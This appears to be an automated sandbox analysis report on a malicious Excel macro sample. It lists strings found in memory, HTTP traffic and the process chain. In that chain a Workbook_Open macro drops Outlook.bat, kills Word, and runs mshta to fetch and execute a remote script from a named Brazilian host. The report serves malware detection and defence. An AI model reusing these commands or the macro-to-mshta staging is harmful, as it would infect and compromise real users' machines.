Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://outlook.office365.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://outlook.office365.com/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://powerlift.acompli.net
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: mshta.exe, 0000000A.00000002.556298812.000000000CC90000.00000004.00000800.00020000.00000000.sdmp, owl.carousel[1].js.10.drString found in binary or memory: https://regexper.com/#(http%3A%7Chttps%3A%7C)%5C%2F%5C%2F(player.%7Cwww.%7Capp.)%3F(vimeo%5C.com%7Cy
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://roaming.edog.
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: mshta.exe, 0000000A.00000002.547963442.00000000073F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s.w.org/images/core/emoji/11/72x72/https://s.w.org/images/core/emoji/11/svg/d
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://settings.outlook.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://staging.cortana.ai
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: js[1].js.10.drString found in binary or memory: https://streetviewpixels-pa.googleapis.com/v1/thumbnail?hl=en-US
Source: js[1].js.10.drString found in binary or memory: https://streetviewpixels-pa.googleapis.com/v1/tile
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: js[1].js.10.drString found in binary or memory: https://support.google.com/fusiontables/answer/9185417).
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://tasks.office.com
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/s
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.540174729.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386488905.000000000CCEE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2#
Source: mshta.exe, 0000000A.00000003.332063162.0000000006B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2$
Source: mshta.exe, 0000000A.00000002.547963442.00000000073F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twemoji.maxcdn.com/2/
Source: mshta.exe, 0000000A.00000003.385933121.00000000070A9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386403873.000000000CD62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: mshta.exe, 0000000A.00000002.556298812.000000000CC90000.00000004.00000800.00020000.00000000.sdmp, owl.carousel[1].js.10.drString found in binary or memory: https://vimeo.com/:id
Source: mshta.exe, 0000000A.00000002.556298812.000000000CC90000.00000004.00000800.00020000.00000000.sdmp, owl.carousel[1].js.10.drString found in binary or memory: https://vimeo.com/channels/:channel/:id
Source: mshta.exe, 0000000A.00000002.556298812.000000000CC90000.00000004.00000800.00020000.00000000.sdmp, owl.carousel[1].js.10.drString found in binary or memory: https://vimeo.com/groups/:group/videos/:id
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://webshell.suite.office.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://wus2.contentsync.
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: js[1].js.10.drString found in binary or memory: https://www.google.com
Source: js[1].js.10.drString found in binary or memory: https://www.google.com/maps
Source: js[1].js.10.drString found in binary or memory: https://www.google.com/maps/vt
Source: mshta.exe, 0000000A.00000002.543184834.0000000006BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/mapsd
Source: mshta.exe, 0000000A.00000002.557557475.000000000D1F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: mshta.exe, 0000000A.00000002.556298812.000000000CC90000.00000004.00000800.00020000.00000000.sdmp, owl.carousel[1].js.10.drString found in binary or memory: https://www.youtube.com/watch?v=:id
Source: mshta.exe, 0000000A.00000002.556298812.000000000CC90000.00000004.00000800.00020000.00000000.sdmp, owl.carousel[1].js.10.drString found in binary or memory: https://youtu.be/:id
DNS traffic detected: queries for: facextrade.com.br (source: unknown)
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/switcher.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/arrow_down.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/custom-script.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/chart.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/images/up-arrow.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeWindows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dllJump to behavior

System Summary

Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsOLE, VBA macro line: sFile = Environ("Public") & "\Outlook.bat"
Source: VBA code instrumentationOLE, VBA macro: Module EstaPastaDeTrabalho, Function Workbook_Open, String environ: sFile = Environ("Public") & "\Outlook.bat"Name: Workbook_Open
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls.0.drOLE, VBA macro line: sFile = Environ("Public") & "\Outlook.bat"
Source: C:\Windows\SysWOW64\mshta.exeCode function: 10_2_081B005310_2_081B0053
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsOLE, VBA macro line: Private Sub Workbook_Open()
Source: VBA code instrumentationOLE, VBA macro: Module EstaPastaDeTrabalho, Function Workbook_OpenName: Workbook_Open
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls.0.drOLE, VBA macro line: Private Sub Workbook_Open()
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 3235D3F3.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls.0.drOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsVirustotal: Detection: 48%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsMetadefender: Detection: 29%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsReversingLabs: Detection: 41%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 8 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im WINWORD.EXE
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txt
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "WINWORD.EXE")
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{9314B019-EAA7-433B-AC70-441037C5876B} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@13/90@4/5
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3080:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: 3235D3F3.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\mshta.exeCode function: 10_2_0857806C push eax; retf 10_2_0857806D
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 8 127.0.0.1
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
